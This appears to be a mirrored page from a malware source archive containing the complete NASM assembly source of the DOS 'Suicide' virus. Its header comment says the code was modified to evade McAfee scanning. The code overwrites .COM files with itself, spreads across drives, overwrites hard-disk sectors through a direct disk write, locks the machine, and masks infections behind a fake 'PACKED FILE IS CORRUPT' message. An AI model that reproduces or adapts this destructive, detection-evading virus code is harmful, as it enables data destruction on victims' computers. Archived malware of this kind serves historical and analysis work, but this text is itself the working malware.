mirror of
https://github.com/vxunderground/MalwareSourceCode
synced 2024-06-28 09:52:32 +00:00
168 lines
4.0 KiB
NASM
168 lines
4.0 KiB
NASM
;|
|
|
;| SUICIDE VIRUS BY TESLA 5
|
|
;|
|
|
;| THIS VIRUS IS A SLIGHTLY MODIFIED VERSION OF THE DEICIDE VIRUS OF
|
|
;| GLENN BENTON, SO IT IS SMALLER IN SIZE AND A BIT MORE EFFICIENT. I
|
|
;| THINK GLENN WAS A BIG SATANIST, BECAUSE OF THE NAME DEI-CIDE (KILL
|
|
;| EVERYTHING THAT'S HOLY?). WELL, I MODIFIED THE CODE, SO IT IS NO
|
|
;| MORE DETECTABLE BY SCAN OF MCAFEE. THANKS TO 'CRYPT'? AND XTSC FOR
|
|
;| THE SOURCE CODE. GREETINGS TO ALL VIRUS WRITERS.
|
|
;|
|
|
|
|
START_PROG: JMP SHORT START_VIRUS
|
|
|
|
MESSAGE DB 0DH,0AH,'SUICIDE!'
|
|
DB 0DH,0AH
|
|
DB 0DH,0AH,'TESLA 5 SAYS : NO MORE HD!'
|
|
DB 0DH,0AH
|
|
DB 0DH,0AH,'NEXT TIME BE SCARED FOR ILLEGAL STUFF!$'
|
|
|
|
START_VIRUS: MOV AH,19H
|
|
INT 21H
|
|
|
|
DB 0A2H
|
|
DW OFFSET INFECT_DRIVE
|
|
DB 0A2H
|
|
DW OFFSET ACTUAL_DRIVE
|
|
|
|
MOV AH,47H
|
|
MOV DL,0
|
|
MOV SI,OFFSET ACTUAL_DIR
|
|
INT 21H
|
|
|
|
MOV AH,1AH
|
|
MOV DX,OFFSET NEW_DTA
|
|
INT 21H
|
|
|
|
INFECT_NEXT: MOV AH,3BH
|
|
MOV DX,OFFSET ROOT_DIR
|
|
INT 21H
|
|
|
|
MOV AH,4EH
|
|
MOV CX,0
|
|
MOV DX,OFFSET SEARCH_PATH
|
|
INT 21H
|
|
|
|
CHECK_COMMAND: MOV AL,'N'
|
|
CMP [NEW_DTA+23H],AL
|
|
JNZ CHECK_INFECT
|
|
JMP SHORT SEARCH_NEXT
|
|
NOP
|
|
|
|
CHECK_INFECT: MOV AX,3D02H
|
|
MOV DX,OFFSET NEW_DTA+1EH
|
|
INT 21H
|
|
MOV FILE_HANDLE,AX
|
|
XCHG BX,AX
|
|
|
|
MOV AX,5700H
|
|
INT 21H
|
|
MOV FILE_DATE,DX
|
|
MOV FILE_TIME,CX
|
|
|
|
CALL GO_BEG_FILE
|
|
|
|
MOV AH,3FH
|
|
MOV CX,2
|
|
MOV DX,OFFSET READ_BUF
|
|
INT 21H
|
|
|
|
MOV AL,BYTE PTR [READ_BUF+1]
|
|
CMP AL,OFFSET START_VIRUS-102H
|
|
JNZ INFECT
|
|
|
|
MOV AH,3EH
|
|
INT 21H
|
|
|
|
SEARCH_NEXT: MOV AH,4FH
|
|
INT 21H
|
|
JNC CHECK_COMMAND
|
|
|
|
MOV AL,INFECT_DRIVE
|
|
CMP AL,0
|
|
JNZ NO_A_DRIVE
|
|
INC AL
|
|
NO_A_DRIVE: INC AL
|
|
CMP AL,3
|
|
JNZ NO_DESTROY
|
|
|
|
XOR BX,BX
|
|
MOV AL,2
|
|
MOV DX,BX
|
|
MOV CX,40H
|
|
INT 26H
|
|
|
|
MOV AH,9
|
|
MOV DX,OFFSET MESSAGE
|
|
INT 21H
|
|
|
|
LOCK_SYSTEM: CLI
|
|
JMP SHORT LOCK_SYSTEM
|
|
|
|
NO_DESTROY:
|
|
MOV AH,0EH
|
|
MOV DL,AL
|
|
MOV INFECT_DRIVE,DL
|
|
INT 21H
|
|
|
|
JMP INFECT_NEXT
|
|
|
|
INFECT: CALL GO_BEG_FILE
|
|
|
|
MOV AH,40H
|
|
MOV DX,100H
|
|
MOV CX,OFFSET END_VIRUS-100H
|
|
INT 21H
|
|
|
|
MOV AX,5701H
|
|
MOV CX,FILE_TIME
|
|
MOV DX,FILE_DATE
|
|
INT 21H
|
|
|
|
MOV AH,3EH
|
|
INT 21H
|
|
|
|
MOV DL,BYTE PTR [ACTUAL_DRIVE]
|
|
MOV AH,0EH
|
|
INT 21H
|
|
|
|
MOV AH,3BH
|
|
MOV DX,OFFSET ACTUAL_DIR
|
|
INT 21H
|
|
|
|
MOV AH,9
|
|
MOV DX,OFFSET QUIT_MESSAGE
|
|
INT 21H
|
|
|
|
INT 20H
|
|
|
|
GO_BEG_FILE: MOV AX,4200
|
|
XOR CX,CX
|
|
XOR DX,DX
|
|
INT 21H
|
|
RET
|
|
|
|
|
|
FILE_DATE DW (?)
|
|
FILE_TIME DW (?)
|
|
|
|
FILE_HANDLE DW (?)
|
|
|
|
INFECT_DRIVE DB (?)
|
|
|
|
ROOT_DIR DB '\',0
|
|
|
|
SEARCH_PATH DB '*.COM',0
|
|
|
|
READ_BUF DB 2 DUP (?)
|
|
|
|
ACTUAL_DRIVE DB (?)
|
|
|
|
QUIT_MESSAGE DB 'PACKED FILE IS CORRUPT',0DH,0AH,'$'
|
|
|
|
NEW_DTA DB 2BH DUP (?)
|
|
|
|
ACTUAL_DIR DB 40H DUP (?)
|
|
|
|
END_VIRUS:
|